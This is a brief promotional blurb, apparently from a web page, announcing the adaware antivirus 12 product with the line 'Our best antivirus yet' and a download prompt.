Discover the new adaware antivirus 12

Our best antivirus yet

Download Now